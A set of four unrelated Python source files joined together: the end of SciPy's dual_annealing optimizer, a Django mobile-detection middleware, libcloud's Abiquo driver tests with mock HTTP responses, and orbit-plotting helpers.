References
----------
    .. [1] Tsallis C. Possible generalization of Boltzmann-Gibbs
        statistics. Journal of Statistical Physics, 52, 479-487 (1988).
.. [2] Tsallis C, Stariolo DA. Generalized Simulated Annealing.
Physica A, 233, 395-406 (1996).
.. [3] Xiang Y, Sun DY, Fan W, Gong XG. Generalized Simulated
Annealing Algorithm and Its Application to the Thomson Model.
Physics Letters A, 233, 216-220 (1997).
.. [4] Xiang Y, Gong XG. Efficiency of Generalized Simulated
Annealing. Physical Review E, 62, 4473 (2000).
.. [5] Xiang Y, Gubian S, Suomela B, Hoeng J. Generalized
Simulated Annealing for Efficient Global Optimization: the GenSA
Package for R. The R Journal, Volume 5/1 (2013).
.. [6] Mullen, K. Continuous Global Optimization in R. Journal of
Statistical Software, 60(6), 1 - 45, (2014). DOI:10.18637/jss.v060.i06
Examples
--------
The following example is a 10-dimensional problem, with many local minima.
The function involved is called Rastrigin
(https://en.wikipedia.org/wiki/Rastrigin_function)
>>> from scipy.optimize import dual_annealing
    >>> import numpy as np
    >>> func = lambda x: np.sum(x*x - 10*np.cos(2*np.pi*x)) + 10*np.size(x)
>>> lw = [-5.12] * 10
>>> up = [5.12] * 10
>>> ret = dual_annealing(func, bounds=list(zip(lw, up)), seed=1234)
>>> print("global minimum: xmin = {0}, f(xmin) = {1:.6f}".format(
... ret.x, ret.fun))
global minimum: xmin = [-4.26437714e-09 -3.91699361e-09 -1.86149218e-09 -3.97165720e-09
-6.29151648e-09 -6.53145322e-09 -3.93616815e-09 -6.55623025e-09
-6.05775280e-09 -5.00668935e-09], f(xmin) = 0.000000
"""
if x0 is not None and not len(x0) == len(bounds):
raise ValueError('Bounds size does not match x0')
lu = list(zip(*bounds))
lower = np.array(lu[0])
upper = np.array(lu[1])
# Check that restart temperature ratio is correct
if restart_temp_ratio <= 0. or restart_temp_ratio >= 1.:
raise ValueError('Restart temperature ratio has to be in range (0, 1)')
# Checking bounds are valid
if (np.any(np.isinf(lower)) or np.any(np.isinf(upper)) or np.any(
np.isnan(lower)) or np.any(np.isnan(upper))):
raise ValueError('Some bounds values are inf values or nan values')
# Checking that bounds are consistent
if not np.all(lower < upper):
raise ValueError('Bounds are not consistent min < max')
# Checking that bounds are the same length
if not len(lower) == len(upper):
raise ValueError('Bounds do not have the same dimensions')
# Wrapper for the objective function
func_wrapper = ObjectiveFunWrapper(func, maxfun, *args)
    # Wrapper for the minimizer
minimizer_wrapper = LocalSearchWrapper(
bounds, func_wrapper, **local_search_options)
# Initialization of RandomState for reproducible runs if seed provided
rand_state = check_random_state(seed)
# Initialization of the energy state
energy_state = EnergyState(lower, upper, callback)
energy_state.reset(func_wrapper, rand_state, x0)
# Minimum value of annealing temperature reached to perform
# re-annealing
temperature_restart = initial_temp * restart_temp_ratio
# VisitingDistribution instance
visit_dist = VisitingDistribution(lower, upper, visit, rand_state)
# Strategy chain instance
strategy_chain = StrategyChain(accept, visit_dist, func_wrapper,
minimizer_wrapper, rand_state, energy_state)
# Run the search loop
need_to_stop = False
iteration = 0
message = []
t1 = np.exp((visit - 1) * np.log(2.0)) - 1.0
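    # Temperature schedule from the Notes section of `dual_annealing`:
    # T(t) = T(1) * (2**(qv - 1) - 1) / ((1 + t)**(qv - 1) - 1) with
    # qv = `visit`; t1 is the constant numerator and t2 below is the
    # denominator evaluated at each iteration (t = i + 1).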
    while not need_to_stop:
for i in range(maxiter):
# Compute temperature for this step
s = float(i) + 2.0
t2 = np.exp((visit - 1) * np.log(s)) - 1.0
temperature = initial_temp * t1 / t2
if iteration >= maxiter:
message.append("Maximum number of iteration reached")
need_to_stop = True
break
# Need a re-annealing process?
if temperature < temperature_restart:
energy_state.reset(func_wrapper, rand_state)
break
# starting strategy chain
val = strategy_chain.run(i, temperature)
if val is not None:
message.append(val)
need_to_stop = True
break
# Possible local search at the end of the strategy chain
if not no_local_search:
val = strategy_chain.local_search()
if val is not None:
message.append(val)
need_to_stop = True
break
iteration += 1
# Return the OptimizeResult
res = OptimizeResult()
res.x = energy_state.xbest
res.fun = energy_state.ebest
res.nit = iteration
res.nfev = func_wrapper.nfev
res.njev = func_wrapper.ngev
res.nhev = func_wrapper.nhev
res.message = message
return res
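# Illustrative sketch (not part of the original module): how the ``callback``
# argument documented above can be used to stop the search early. The problem
# and the 1e-8 threshold below are arbitrary assumptions for demonstration.
def _example_dual_annealing_callback():  # pragma: no cover - doc example only
    import numpy as np

    def rastrigin(x):
        # Rastrigin test function, as in the docstring example above.
        return np.sum(x * x - 10 * np.cos(2 * np.pi * x)) + 10 * np.size(x)

    def stop_when_converged(x, f, context):
        # ``context`` is 0, 1 or 2 depending on where the minimum was found.
        # Returning True stops the annealing loop early.
        return f < 1e-8

    lw, up = [-5.12] * 5, [5.12] * 5
    return dual_annealing(rastrigin, bounds=list(zip(lw, up)),
                          callback=stop_when_converged, seed=1234)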
|
|
# -*- coding: utf-8 -*-
import re
import random
from types import MethodType
from django.http import HttpResponseRedirect
from django.http import SimpleCookie
from django.http import HttpRequest
from django.conf import settings
try:
from threading import local
except ImportError:
from django.utils._threading_local import local
# Instead of changing ``settings.TEMPLATE_DIRS`` on the fly, which would
# not work properly with concurrent requests, we use thread-local
# variables to determine the template directory used for mobile
# requests, so the template loader
# ``opps.contrib.mobile.template.Loader`` can be used to select the
# right templates in each of your project views.
THREAD_LOCALS = local()
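# Illustrative sketch (an assumption, not the actual opps loader code): a
# template loader only needs to read ``THREAD_LOCALS.template_dirs`` to pick
# up the directories set by the middleware for the current thread/request.
def _current_template_dirs():
    return getattr(THREAD_LOCALS, 'template_dirs',
                   getattr(settings, 'TEMPLATE_DIRS', ()))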
def _set_cookie(self, key, value='', max_age=None, expires=None, path='/',
domain=None, secure=False):
self._resp_cookies[key] = value
self.COOKIES[key] = value
if max_age is not None:
self._resp_cookies[key]['max-age'] = max_age
if expires is not None:
self._resp_cookies[key]['expires'] = expires
if path is not None:
self._resp_cookies[key]['path'] = path
if domain is not None:
self._resp_cookies[key]['domain'] = domain
if secure:
self._resp_cookies[key]['secure'] = True
def _delete_cookie(self, key, path='/', domain=None):
self.set_cookie(key, max_age=0, path=path, domain=domain,
expires='Thu, 01-Jan-1970 00:00:00 GMT')
try:
del self.COOKIES[key]
except KeyError:
pass
IGNORE_AGENTS = getattr(settings, 'OPPS_MOBILE_IGNORE_USER_AGENTS', [])
USER_AGENTS_TEST_MATCH = (
"w3c ", "acs-", "alav", "alca", "amoi", "audi",
"avan", "benq", "bird", "blac", "blaz", "brew",
"cell", "cldc", "cmd-", "dang", "doco", "eric",
"hipt", "inno", "ipaq", "java", "jigs", "kddi",
"keji", "leno", "lg-c", "lg-d", "lg-g", "lge-",
"maui", "maxo", "midp", "mits", "mmef", "mobi",
"mot-", "moto", "mwbp", "nec-", "newt", "noki",
"xda", "palm", "pana", "pant", "phil", "play",
"port", "prox", "qwap", "sage", "sams", "sany",
"sch-", "sec-", "send", "seri", "sgh-", "shar",
"sie-", "siem", "smal", "smar", "sony", "sph-",
"symb", "t-mo", "teli", "tim-", "tosh", "tsm-",
"upg1", "upsi", "vk-v", "voda", "wap-", "wapa",
"wapi", "wapp", "wapr", "webc", "winw", "winw",
"xda-",)
USER_AGENTS_TEST_SEARCH = u"(?:%s)" % u'|'.join((
'up.browser', 'up.link', 'mmp', 'symbian', 'smartphone', 'midp',
'wap', 'phone', 'windows ce', 'pda', 'mobile', 'mini', 'palm',
'netfront', 'opera mobi',))
USER_AGENTS_EXCEPTION_SEARCH = u"(?:%s)" % u'|'.join(('ipad',))
HTTP_ACCEPT_REGEX = re.compile(r"application/vnd\.wap\.xhtml\+xml",
re.IGNORECASE)
def is_mobile_agent(request):
user_agents_test_match = r'^(?:%s)' % '|'.join(
USER_AGENTS_TEST_MATCH)
user_agents_test_match_regex = re.compile(
user_agents_test_match, re.IGNORECASE)
user_agents_test_search_regex = re.compile(
USER_AGENTS_TEST_SEARCH, re.IGNORECASE)
user_agents_exception_search_regex = re.compile(
USER_AGENTS_EXCEPTION_SEARCH, re.IGNORECASE)
is_mobile = False
if 'HTTP_USER_AGENT' in request.META:
user_agent = request.META['HTTP_USER_AGENT']
if user_agents_test_search_regex.search(user_agent) and \
not user_agents_exception_search_regex.search(user_agent):
is_mobile = True
else:
if 'HTTP_ACCEPT' in request.META:
http_accept = request.META['HTTP_ACCEPT']
if HTTP_ACCEPT_REGEX.search(http_accept):
is_mobile = True
if not is_mobile:
if user_agents_test_match_regex.match(user_agent):
is_mobile = True
# Check for ignore user agents
if IGNORE_AGENTS and user_agent in IGNORE_AGENTS:
is_mobile = False
return is_mobile
class MobileDetectionMiddleware(object):
u"""Used django-mobile core
https://github.com/gregmuellegger/django-mobile/blob/3093a9791e5e812021e49
3226e5393033115c8bf/django_mobile/middleware.py
"""
def process_request(self, request):
is_mobile = is_mobile_agent(request)
request.is_mobile = is_mobile
THREAD_LOCALS.template_dirs = settings.TEMPLATE_DIRS_WEB
if is_mobile and settings.OPPS_CHECK_MOBILE:
THREAD_LOCALS.template_dirs = settings.TEMPLATE_DIRS_MOBILE
if settings.OPPS_DOMAIN_MOBILE and \
request.META.get('HTTP_HOST', '') != \
settings.OPPS_DOMAIN_MOBILE:
return HttpResponseRedirect(u"{0}://{1}{2}".format(
settings.OPPS_PROTOCOL_MOBILE,
settings.OPPS_DOMAIN_MOBILE,
request.path
))
class MobileRedirectMiddleware(object):
"""
    Redirects requests between the web and mobile domains based on the
    ``template_mode`` cookie/parameter, and allows setting and deleting of
    cookies from requests in exactly the same way as responses.
request.set_cookie('name', 'value')
The set_cookie and delete_cookie are exactly the same as the ones built
into the Django HttpResponse class.
http://docs.djangoproject.com/en/dev/ref/request-response
/#django.http.HttpResponse.set_cookie
"""
def process_request(self, request):
domain = request.META.get('HTTP_HOST', '')
mobile_domain = settings.OPPS_DOMAIN_MOBILE
current_cookie = request.COOKIES.get('template_mode', None)
template_mode = request.GET.get('template_mode', None)
THREAD_LOCALS.template_dirs = settings.TEMPLATE_DIRS_WEB
if hasattr(request, "is_mobile"):
agent_is_mobile = request.is_mobile
else:
agent_is_mobile = is_mobile_agent(request)
domain_is_mobile = domain == mobile_domain
request_is_mobile = agent_is_mobile and domain_is_mobile
if not template_mode and not current_cookie:
if domain_is_mobile:
template_mode = u'mobile'
else:
return
if request_is_mobile and template_mode == u'desktop':
prot = settings.OPPS_PROTOCOL_WEB
web_domain = settings.OPPS_DOMAIN_WEB
url = u"{0}://{1}/?template_mode=desktop".format(prot, web_domain)
return HttpResponseRedirect(url)
elif not request_is_mobile and template_mode == u'mobile':
prot = settings.OPPS_PROTOCOL_MOBILE
url = u"{0}://{1}/?template_mode=mobile".format(prot,
mobile_domain)
            # Set a random cache prefix for the mobile device
settings.CACHE_MIDDLEWARE_KEY_PREFIX = u"opps_site-{0}-{1}".format(
settings.SITE_ID, random.getrandbits(32))
return HttpResponseRedirect(url)
request._resp_cookies = SimpleCookie()
request.set_cookie = MethodType(_set_cookie, request, HttpRequest)
request.delete_cookie = MethodType(
_delete_cookie, request, HttpRequest
)
if template_mode:
request.set_cookie('template_mode', template_mode)
current_cookie = template_mode
if current_cookie and current_cookie.strip().lower() == u"mobile":
THREAD_LOCALS.template_dirs = settings.TEMPLATE_DIRS_MOBILE
def process_response(self, request, response):
if hasattr(request, '_resp_cookies') and request._resp_cookies:
response.cookies.update(request._resp_cookies)
return response
|
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Abiquo Test Suite
"""
import sys
from libcloud.utils.py3 import ET
from libcloud.utils.py3 import httplib
from libcloud.compute.drivers.abiquo import AbiquoNodeDriver
from libcloud.common.abiquo import ForbiddenError, get_href
from libcloud.common.types import InvalidCredsError, LibcloudError
from libcloud.compute.base import NodeLocation, NodeImage
from libcloud.test.compute import TestCaseMixin
from libcloud.test import MockHttp, unittest
from libcloud.test.file_fixtures import ComputeFileFixtures
class AbiquoNodeDriverTest(TestCaseMixin, unittest.TestCase):
"""
Abiquo Node Driver test suite
"""
@classmethod
def setUpClass(cls):
"""
Set up the driver with the main user
"""
AbiquoNodeDriver.connectionCls.conn_class = AbiquoMockHttp
cls.driver = AbiquoNodeDriver('son', 'goku',
'http://dummy.host.com/api')
def test_unauthorized_controlled(self):
"""
Test the Unauthorized Exception is Controlled.
Test, through the 'login' method, that a '401 Unauthorized'
        raises an 'InvalidCredsError' instead of the 'MalformedUrlException'
"""
self.assertRaises(InvalidCredsError, AbiquoNodeDriver, 'son',
'goten', 'http://dummy.host.com/api')
def test_forbidden_controlled(self):
"""
Test the Forbidden Exception is Controlled.
Test, through the 'list_images' method, that a '403 Forbidden'
        raises a 'ForbiddenError' instead of the 'MalformedUrlException'
"""
AbiquoNodeDriver.connectionCls.conn_class = AbiquoMockHttp
conn = AbiquoNodeDriver('son', 'gohan', 'http://dummy.host.com/api')
self.assertRaises(ForbiddenError, conn.list_images)
def test_handle_other_errors_such_as_not_found(self):
"""
Test common 'logical' exceptions are controlled.
        Test that common exceptions (normally 404-Not Found and 409-Conflict),
        which return an XMLResponse with an explanation of the error, are
        controlled.
"""
self.driver = AbiquoNodeDriver('go', 'trunks',
'http://dummy.host.com/api')
self.assertRaises(LibcloudError, self.driver.list_images)
def test_ex_create_and_delete_empty_group(self):
"""
Test the creation and deletion of an empty group.
"""
group = self.driver.ex_create_group('libcloud_test_group')
group.destroy()
def test_create_node_no_image_raise_exception(self):
"""
Test 'create_node' without image.
        Test that the 'create_node' function without the 'image' parameter
        raises an Exception.
"""
self.assertRaises(LibcloudError, self.driver.create_node)
def test_list_locations_response(self):
if not self.should_list_locations:
return None
locations = self.driver.list_locations()
self.assertTrue(isinstance(locations, list))
def test_create_node_specify_location(self):
"""
Test you can create a node specifying the location.
"""
image = self.driver.list_images()[0]
location = self.driver.list_locations()[0]
self.driver.create_node(image=image, location=location)
def test_create_node_specify_wrong_location(self):
"""
        Test that you cannot create a node with a wrong location.
"""
image = self.driver.list_images()[0]
location = NodeLocation(435, 'fake-location', 'Spain', self.driver)
self.assertRaises(LibcloudError, self.driver.create_node, image=image,
location=location)
def test_create_node_specify_wrong_image(self):
"""
Test image compatibility.
        Some locations can only handle a subset of images, not all of them.
        Test that you cannot create a node with an incompatible
        image-location combination.
"""
# Create fake NodeImage
image = NodeImage(3234, 'dummy-image', self.driver)
location = self.driver.list_locations()[0]
# With this image, it should raise an Exception
self.assertRaises(LibcloudError, self.driver.create_node, image=image,
location=location)
def test_create_node_specify_group_name(self):
"""
Test 'create_node' into a concrete group.
"""
image = self.driver.list_images()[0]
self.driver.create_node(image=image, group_name='new_group_name')
def test_create_group_location_does_not_exist(self):
"""
        Test 'ex_create_group' with a nonexistent location.
        Defines a 'fake' location and tries to create a group in it.
"""
location = NodeLocation(435, 'fake-location', 'Spain', self.driver)
# With this location, it should raise an Exception
self.assertRaises(LibcloudError, self.driver.ex_create_group,
name='new_group_name',
location=location)
def test_destroy_node_response(self):
"""
'destroy_node' basic test.
        Override the driver to return a node that is available to be
        undeployed (by default it returns an already undeployed node, for
        test creation).
"""
self.driver = AbiquoNodeDriver('go', 'trunks',
'http://dummy.host.com/api')
node = self.driver.list_nodes()[0]
ret = self.driver.destroy_node(node)
self.assertTrue(ret)
def test_destroy_node_response_failed(self):
"""
'destroy_node' asynchronous error.
Test that the driver handles correctly when, for some reason,
the 'destroy' job fails.
"""
self.driver = AbiquoNodeDriver('muten', 'roshi',
'http://dummy.host.com/api')
node = self.driver.list_nodes()[0]
ret = self.driver.destroy_node(node)
self.assertFalse(ret)
def test_destroy_node_allocation_state(self):
"""
Test the 'destroy_node' invalid state.
Try to destroy a node when the node is not running.
"""
self.driver = AbiquoNodeDriver('ve', 'geta',
'http://dummy.host.com/api')
# Override the destroy to return a different node available to be
# undeployed
node = self.driver.list_nodes()[0]
# The mock class with the user:password 've:geta' returns a node that
# is in 'ALLOCATION' state and hence, the 'destroy_node' method should
# raise a LibcloudError
self.assertRaises(LibcloudError, self.driver.destroy_node, node)
def test_destroy_not_deployed_group(self):
"""
Test 'ex_destroy_group' when group is not deployed.
"""
location = self.driver.list_locations()[0]
group = self.driver.ex_list_groups(location)[1]
self.assertTrue(group.destroy())
def test_destroy_deployed_group(self):
"""
Test 'ex_destroy_group' when there are machines running.
"""
location = self.driver.list_locations()[0]
group = self.driver.ex_list_groups(location)[0]
self.assertTrue(group.destroy())
def test_destroy_deployed_group_failed(self):
"""
Test 'ex_destroy_group' fails.
Test driver handles correctly when, for some reason, the
asynchronous job fails.
"""
self.driver = AbiquoNodeDriver('muten', 'roshi',
'http://dummy.host.com/api')
location = self.driver.list_locations()[0]
group = self.driver.ex_list_groups(location)[0]
self.assertFalse(group.destroy())
def test_destroy_group_invalid_state(self):
"""
Test 'ex_destroy_group' invalid state.
        Test that the driver raises an exception when the group is in an
        invalid transient state.
"""
self.driver = AbiquoNodeDriver('ve', 'geta',
'http://dummy.host.com/api')
location = self.driver.list_locations()[0]
group = self.driver.ex_list_groups(location)[1]
self.assertRaises(LibcloudError, group.destroy)
def test_run_node(self):
"""
Test 'ex_run_node' feature.
"""
node = self.driver.list_nodes()[0]
# Node is by default in NodeState.TERMINATED and AbiquoState ==
# 'NOT_ALLOCATED'
        # so it is available to be run
self.driver.ex_run_node(node)
def test_run_node_invalid_state(self):
"""
Test 'ex_run_node' invalid state.
        Test that the driver raises an exception when trying to run a
        node that is in an invalid state to run.
"""
self.driver = AbiquoNodeDriver('go', 'trunks',
'http://dummy.host.com/api')
node = self.driver.list_nodes()[0]
# Node is by default in AbiquoState = 'ON' for user 'go:trunks'
        # so it is not available to be run
self.assertRaises(LibcloudError, self.driver.ex_run_node, node)
def test_run_node_failed(self):
"""
Test 'ex_run_node' fails.
Test driver handles correctly when, for some reason, the
asynchronous job fails.
"""
self.driver = AbiquoNodeDriver('ten', 'shin',
'http://dummy.host.com/api')
node = self.driver.list_nodes()[0]
# Node is in the correct state, but it fails because of the
# async task and it raises the error.
self.assertRaises(LibcloudError, self.driver.ex_run_node, node)
def test_get_href(self):
xml = '''
<datacenter>
<link href="http://10.60.12.7:80/api/admin/datacenters/2"
type="application/vnd.abiquo.datacenter+xml" rel="edit1"/>
<link href="http://10.60.12.7:80/ponies/bar/foo/api/admin/datacenters/3"
type="application/vnd.abiquo.datacenter+xml" rel="edit2"/>
<link href="http://vdcbridge.interoute.com:80/jclouds/apiouds/api/admin/enterprises/1234"
type="application/vnd.abiquo.datacenter+xml" rel="edit3"/>
</datacenter>
'''
elem = ET.XML(xml)
href = get_href(element=elem, rel='edit1')
self.assertEqual(href, '/admin/datacenters/2')
href = get_href(element=elem, rel='edit2')
self.assertEqual(href, '/admin/datacenters/3')
href = get_href(element=elem, rel='edit3')
self.assertEqual(href, '/admin/enterprises/1234')
class AbiquoMockHttp(MockHttp):
"""
    Mock the functionality of the remote Abiquo API.
"""
fixtures = ComputeFileFixtures('abiquo')
fixture_tag = 'default'
def _api_login(self, method, url, body, headers):
if headers['Authorization'] == 'Basic c29uOmdvdGVu':
expected_response = self.fixtures.load('unauthorized_user.html')
expected_status = httplib.UNAUTHORIZED
else:
expected_response = self.fixtures.load('login.xml')
expected_status = httplib.OK
return (expected_status, expected_response, {}, '')
def _api_cloud_virtualdatacenters(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('vdcs.xml'), {}, '')
def _api_cloud_virtualdatacenters_4(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('vdc_4.xml'), {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances(self, method, url, body, headers):
if method == 'POST':
vapp_name = ET.XML(body).findtext('name')
if vapp_name == 'libcloud_test_group':
                # we come from 'test_ex_create_and_delete_empty_group(self):'
                # method and so, we return the 'ok' response
response = self.fixtures.load('vdc_4_vapp_creation_ok.xml')
return (httplib.OK, response, {}, '')
elif vapp_name == 'new_group_name':
                # we come from one of the tests that use 'new_group_name'
                # and so, we return the 'ok' response
response = self.fixtures.load('vdc_4_vapp_creation_ok.xml')
return (httplib.OK, response, {}, '')
else:
# It will be a 'GET';
return (httplib.OK, self.fixtures.load('vdc_4_vapps.xml'), {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_5(self, method, url, body, headers):
if method == 'GET':
if headers['Authorization'] == 'Basic dmU6Z2V0YQ==':
# Try to destroy a group with 'needs_sync' state
response = self.fixtures.load('vdc_4_vapp_5_needs_sync.xml')
else:
# Try to destroy a group with 'undeployed' state
response = self.fixtures.load('vdc_4_vapp_5.xml')
return (httplib.OK, response, {}, '')
else:
# it will be a 'DELETE'
return (httplib.NO_CONTENT, '', {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6(self, method, url, body, headers):
if method == 'GET':
# deployed vapp
response = self.fixtures.load('vdc_4_vapp_6.xml')
return (httplib.OK, response, {}, '')
else:
# it will be a 'DELETE'
return (httplib.NO_CONTENT, '', {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_tasks_1da8c8b6_86f6_49ef_9d29_57dcc73b875a(self, method, url, body, headers):
if headers['Authorization'] == 'Basic bXV0ZW46cm9zaGk=':
# User 'muten:roshi' failed task
response = self.fixtures.load(
'vdc_4_vapp_6_undeploy_task_failed.xml')
else:
response = self.fixtures.load('vdc_4_vapp_6_undeploy_task.xml')
return (httplib.OK, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_5_virtualmachines(
self, method, url, body, headers):
        # This virtual app never has virtual machines
if method == 'GET':
response = self.fixtures.load('vdc_4_vapp_5_vms.xml')
return (httplib.OK, response, {}, '')
elif method == 'POST':
# it must be a POST
response = self.fixtures.load('vdc_4_vapp_6_vm_creation_ok.xml')
return (httplib.CREATED, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines(
self, method, url, body, headers):
        # Default-created virtual app virtual machines
if method == 'GET':
if headers['Authorization'] == 'Basic dmU6Z2V0YQ==':
response = self.fixtures.load('vdc_4_vapp_6_vms_allocated.xml')
else:
response = self.fixtures.load('vdc_4_vapp_6_vms.xml')
return (httplib.OK, response, {}, '')
else:
# it must be a POST
response = self.fixtures.load('vdc_4_vapp_6_vm_creation_ok.xml')
return (httplib.CREATED, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3(self, method, url, body, headers):
if (headers['Authorization'] == 'Basic Z286dHJ1bmtz' or
headers['Authorization'] == 'Basic bXV0ZW46cm9zaGk='):
# Undeploy node
response = self.fixtures.load("vdc_4_vapp_6_vm_3_deployed.xml")
elif headers['Authorization'] == 'Basic dmU6Z2V0YQ==':
# Try to undeploy a node with 'allocation' state
response = self.fixtures.load('vdc_4_vapp_6_vm_3_allocated.xml')
else:
# Get node
response = self.fixtures.load('vdc_4_vapp_6_vm_3.xml')
return (httplib.OK, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_action_deploy(self, method, url,
body, headers):
response = self.fixtures.load('vdc_4_vapp_6_vm_3_deploy.xml')
return (httplib.CREATED, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_tasks_b44fe278_6b0f_4dfb_be81_7c03006a93cb(self, method, url, body, headers):
if headers['Authorization'] == 'Basic dGVuOnNoaW4=':
# User 'ten:shin' failed task
response = self.fixtures.load(
'vdc_4_vapp_6_vm_3_deploy_task_failed.xml')
else:
response = self.fixtures.load('vdc_4_vapp_6_vm_3_deploy_task.xml')
return (httplib.OK, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_action_undeploy(
self, method, url, body, headers):
response = self.fixtures.load('vdc_4_vapp_6_undeploy.xml')
return (httplib.OK, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_action_reset(self, method,
url, body, headers):
response = self.fixtures.load('vdc_4_vapp_6_vm_3_reset.xml')
return (httplib.CREATED, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_tasks_a8c9818e_f389_45b7_be2c_3db3a9689940(self, method, url, body, headers):
if headers['Authorization'] == 'Basic bXV0ZW46cm9zaGk=':
# User 'muten:roshi' failed task
response = self.fixtures.load(
'vdc_4_vapp_6_undeploy_task_failed.xml')
else:
response = self.fixtures.load('vdc_4_vapp_6_vm_3_reset_task.xml')
return (httplib.OK, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_action_undeploy(self, method, url,
body, headers):
response = self.fixtures.load('vdc_4_vapp_6_vm_3_undeploy.xml')
return (httplib.CREATED, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_network_nics(self, method, url,
body, headers):
response = self.fixtures.load('vdc_4_vapp_6_vm_3_nics.xml')
return (httplib.OK, response, {}, '')
def _api_admin_datacenters(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('dcs.xml'), {}, '')
def _api_admin_enterprises_1(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('ent_1.xml'), {}, '')
def _api_admin_enterprises_1_datacenterrepositories(self, method, url, body, headers):
        # When the user is the common one for all the tests ('son', 'goku'),
        # it creates this basic auth and we return the datacenters value
if headers['Authorization'] == 'Basic Z286dHJ1bmtz':
expected_response = self.fixtures.load("not_found_error.xml")
return (httplib.NOT_FOUND, expected_response, {}, '')
elif headers['Authorization'] != 'Basic c29uOmdvaGFu':
return (httplib.OK, self.fixtures.load('ent_1_dcreps.xml'), {}, '')
else:
# son:gohan user: forbidden error
expected_response = self.fixtures.load("privilege_errors.html")
return (httplib.FORBIDDEN, expected_response, {}, '')
def _api_admin_enterprises_1_datacenterrepositories_2(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('ent_1_dcrep_2.xml'), {}, '')
def _api_admin_enterprises_1_datacenterrepositories_2_virtualmachinetemplates(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('ent_1_dcrep_2_templates.xml'),
{}, '')
def _api_admin_enterprises_1_datacenterrepositories_2_virtualmachinetemplates_11(self, method, url, body, headers):
return (
httplib.OK, self.fixtures.load('ent_1_dcrep_2_template_11.xml'),
{}, '')
if __name__ == '__main__':
sys.exit(unittest.main())
|
|
import os
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from orbitdeterminator.doppler.utils.constants import *
from orbitdeterminator.doppler.utils.utils import *
from mpl_toolkits.mplot3d import Axes3D
def plot_sphere(ax, d: float, n: int) -> None:
""" Plots a sphere on a given axes object.
Args:
ax (matplotlib.axes): axes to plot on
        d (float): sphere radius
        n (int): grid resolution
"""
u = np.linspace(0, np.pi, n)
v = np.linspace(0, 2 * np.pi, n)
x = d * np.outer(np.sin(u), np.sin(v))
y = d * np.outer(np.sin(u), np.cos(v))
z = d * np.outer(np.cos(u), np.ones_like(v))
ax.plot_wireframe(x, y, z, alpha=0.2, linewidth=1, color='gray')
def plot_earth(ax, d: float, filename: str, angle=0):
""" Plots Earth.
Source: https://stackoverflow.com/questions/53074908/map-an-image-onto-a-sphere-and-plot-3d-trajectories
"""
img = plt.imread(filename)
# define a grid matching the map size, subsample along with pixels
u = np.linspace(0, np.pi, img.shape[0])
v = np.linspace(0+angle, 2*np.pi+angle, img.shape[1])
count = 180 # keep 180 points along theta and phi
u_idx = np.linspace(0, img.shape[0] - 1, count).round().astype(int)
v_idx = np.linspace(0, img.shape[1] - 1, count).round().astype(int)
u, v = u[u_idx], v[v_idx]
img = img[np.ix_(u_idx, v_idx)]
u,v = np.meshgrid(u, v)
# sphere
x = d * np.sin(u) * np.cos(v)
y = d * np.sin(u) * np.sin(v)
z = d * np.cos(u)
# create 3d Axes
ax.plot_surface(x.T, y.T, z.T, facecolors=img/255, cstride=1, rstride=1) # we've already pruned ourselves
# make the plot more spherical
#ax.axis('scaled')
def plot_example_3d(x_sat_orbdyn_stm:np.ndarray, x_obs_multiple:np.ndarray, title=None):
""" Plots a sphere, site position and satellite trajectory.
Args:
x_sat_orbdyn_stm (np.array): satellite trajectory array.
x_obs_multiple (np.array): observer positions.
"""
font = {'size': 16}
matplotlib.rc('font', **font)
fig = plt.figure(figsize=(14,14))
ax1 = fig.add_subplot(111, projection='3d')
# Dimension fix
if len(x_obs_multiple.shape) == 2:
        x_obs_multiple = np.expand_dims(x_obs_multiple, axis=2)
#plot_sphere(ax1, d=R_EQ, n=40)
s = [] # Scatter instances
l = [] # Legends
for i in range(x_obs_multiple.shape[2]):
# TODO: Check first argument
ss = ax1.scatter(x_obs_multiple[0,:,i], x_obs_multiple[1,:,i], x_obs_multiple[2,:,i], marker='.', s=4)
st = ax1.scatter(x_obs_multiple[0,0,i], x_obs_multiple[1,0,i], x_obs_multiple[2,0,i], c=ss.get_facecolors())
s.append(st)
l.append(f"Observer {i}")
ax1.set_xlabel("x ECI (m)", fontsize=16, labelpad=10)
ax1.set_ylabel("y ECI (m)", fontsize=16, labelpad=10)
ax1.set_zlabel("z ECI (m)", fontsize=16, labelpad=10)
s4 = ax1.scatter(x_sat_orbdyn_stm[0,0], x_sat_orbdyn_stm[1,0], x_sat_orbdyn_stm[2,0], c='k')
ax1.scatter(x_sat_orbdyn_stm[0,:], x_sat_orbdyn_stm[1,:], x_sat_orbdyn_stm[2,:], marker='.', c='k', s=1)
s.append(s4)
l.append('Satellite')
    if title is not None:
        ax1.title.set_text(title)
